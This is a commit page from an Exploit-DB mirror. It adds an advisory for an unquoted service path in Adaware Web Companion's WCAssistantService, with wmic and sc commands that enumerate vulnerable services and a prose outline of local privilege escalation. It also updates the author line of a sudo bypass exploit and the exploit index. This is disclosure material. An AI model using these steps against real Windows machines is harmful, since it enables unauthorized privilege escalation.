bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2019-11-08

Browse source 
2 changes to exploits/shellcodes

Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
This commit is contained in:
Offensive Security 2019-11-08 05:01:40 +00:00
parent 97f133e755
commit 4ec7754462
3 changed files with 40 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/linux/local/47502.py
View file

@ -1,7 +1,7 @@
# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug

38
exploits/windows/local/47597.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
# Date: 2019-11-06
# Exploit Author: Mariela L Martínez Hdez
# Vendor Homepage: https://webcompanion.com/en/
# Software Link: https://webcompanion.com/en/
# Version: Adaware Web Companion version 4.8.2078.3950
# Tested on: Windows 10 Home (64 bits)
# 1. Description
# Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path.
# 2. PoC
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
WC Assistant WCAssistantService C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe Auto
C:\>sc qc WCAssistantService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WCAssistantService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : WC Assistant
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or othersecurity applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.

1
files_exploits.csv
View file

@ -10754,6 +10754,7 @@ id,file,description,date,author,type,platform,port
47584,exploits/windows/local/47584.txt,"Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path",2019-11-05,"Samuel DiazL",local,windows,
47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.